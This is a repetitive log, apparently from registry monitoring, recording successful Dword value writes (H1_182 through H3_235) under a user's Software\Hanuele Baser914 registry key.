5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_182 Dword -1933896322 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_182 Dword 2088318162 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_182 Dword 2105167729 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_182 Dword 2088315184 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_183 Dword 2137676349 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_183 Dword -236482144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_183 Dword -253432775 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_183 Dword -236483976 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_184 Dword -1171880300 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_184 Dword 1733687426 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_184 Dword 1716948353 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_184 Dword 1733684160 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_185 Dword -354270132 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_185 Dword -591111178 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_185 Dword -574149815 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_185 Dword -591115000 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_186 Dword 747258916 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_186 Dword 1379044250 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_186 Dword 1395771409 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_186 Dword 1379053136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_187 Dword -897357331 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_187 Dword -945742945 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_187 Dword -962434599 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_187 Dword -945746024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_188 Dword 543334578 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_188 Dword 1024425588 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_188 Dword 1007425185 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_188 Dword 1024422112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_189 Dword 93090426 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_189 Dword -1300367390 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_189 Dword -1283541911 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_189 Dword -1300377048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_190 Dword 807591204 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_190 Dword 669793368 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_190 Dword 653219121 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_190 Dword 669791088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_191 Dword 384920557 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_191 Dword -1655011248 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_191 Dword -1671826695 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_191 Dword -1655008072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_192 Dword -1201420611 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_192 Dword 315155194 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_192 Dword 332107841 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_192 Dword 315160064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_193 Dword 2064199175 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_193 Dword -2009641242 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_193 Dword -1993068279 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_193 Dword -2009639096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_194 Dword 1932849454 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_194 Dword -39475480 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_194 Dword -56172847 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_194 Dword -39470960 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_195 Dword 1399312881 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_195 Dword 1930705938 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_195 Dword 1914142617 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_195 Dword 1930697176 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_196 Dword 1638111740 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_196 Dword -394105079 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_196 Dword -377414303 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_196 Dword -394101984 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_197 Dword 1518144577 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_197 Dword 1576061546 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_197 Dword 1559476777 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_197 Dword 1576066152 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_198 Dword 1076594963 success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_198 Dword -748739166 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_198 Dword -765699087 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_198 Dword -748733008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_199 Dword 1747563308 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_199 Dword 1221429825 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_199 Dword 1238300857 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_199 Dword 1221435128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_200 Dword 1261033236 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_200 Dword -1103359620 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_200 Dword -1086364159 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_200 Dword -1103364032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_201 Dword -2130089743 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_201 Dword 866810406 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_201 Dword 849938377 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_201 Dword 866804104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_202 Dword -1546333821 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_202 Dword -1457989705 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_202 Dword -1474583407 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_202 Dword -1457995056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_203 Dword 1428607525 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_203 Dword 512177444 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_203 Dword 528761433 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_203 Dword 512173080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_204 Dword -1797232708 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_204 Dword -1812622368 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_204 Dword -1829313759 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_204 Dword -1812626080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_205 Dword -127262723 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_205 Dword 157548240 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_205 Dword 140542185 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_205 Dword 157542056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_206 Dword -822494927 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_206 Dword 2127714848 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_206 Dword 2144412081 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_206 Dword 2127710192 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_207 Dword 169229409 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_207 Dword -197084592 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_207 Dword -180105351 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_207 Dword -197088968 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_208 Dword -1408865837 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_208 Dword 1773081928 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_208 Dword 1756130497 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_208 Dword 1773079168 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_209 Dword -1205910895 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_209 Dword -551718206 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_209 Dword -568455799 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_209 Dword -551719992 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_210 Dword 1865539140 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_210 Dword 1418452942 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_210 Dword 1435020113 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_210 Dword 1418448144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_211 Dword -1587913724 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_211 Dword -906347238 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_211 Dword -923187175 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_211 Dword -906351016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_212 Dword 185290612 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_212 Dword 1063820408 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_212 Dword 1047259617 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_212 Dword 1063817120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_213 Dword 1138203326 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_213 Dword -1260984672 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_213 Dword -1244293463 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_213 Dword -1260982040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_214 Dword -148130720 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_214 Dword 709184414 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_214 Dword 726021233 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_214 Dword 709186096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_215 Dword -1740063703 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_215 Dword -1615616328 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_215 Dword -1632578247 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_215 Dword -1615613064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_216 Dword -419179109 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_216 Dword 354553532 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_216 Dword 337736321 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_216 Dword 354555072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_217 Dword -2078148416 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_217 Dword -1970246473 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_217 Dword -1953296311 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_217 Dword -1970244088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_218 Dword -1168403602 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_218 Dword -78136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_218 Dword -16928495 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_218 Dword -75952 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_219 Dword 18862282 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_219 Dword 1970086658 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_219 Dword 1953390297 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_219 Dword 1970092184 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_220 Dword -374894926 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_220 Dword -354710112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_220 Dword -338100319 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_220 Dword -354706976 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_221 Dword 192795505 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_221 Dword 1615457416 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_221 Dword 1632279913 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_221 Dword 1615461160 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_222 Dword 1096365606 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_222 Dword -709344566 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_222 Dword -725927375 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_222 Dword -709338000 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_223 Dword -1240705567 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_223 Dword 1260826519 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_223 Dword 1243995129 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_223 Dword 1260830136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_224 Dword 1543041635 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_224 Dword -1063974214 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_224 Dword -1047103167 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_224 Dword -1063969024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_225 Dword -619075828 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_225 Dword 906204616 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_225 Dword 922805769 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_225 Dword 906199112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_226 Dword -1731767330 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_226 Dword -1418593660 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_226 Dword -1435334703 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_226 Dword -1418600048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_227 Dword -1017460330 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_227 Dword 551571738 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_227 Dword 568534169 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_227 Dword 551568088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_228 Dword 227260393 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_228 Dword -1773224191 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_228 Dword -1756511647 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_228 Dword -1773231072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_229 Dword -146750506 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_229 Dword 196940192 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_229 Dword 180249385 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_229 Dword 196937064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_230 Dword 1992498685 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_230 Dword -2127857292 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_230 Dword -2144861967 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_230 Dword -2127862096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_231 Dword -23929951 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_231 Dword -157688368 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_231 Dword -140860999 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_231 Dword -157693960 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_232 Dword 2108273422 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_232 Dword 1812479572 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_232 Dword 1829457665 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_232 Dword 1812474176 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_233 Dword 1807279070 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_233 Dword -512321298 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_233 Dword -529142583 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_233 Dword -512324984 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_234 Dword -921060707 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_234 Dword 1457846254 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_234 Dword 1474792849 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_234 Dword 1457843152 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_235 Dword -884220086 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_235 Dword -866948910 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_235 Dword -850384039 success or wait 1
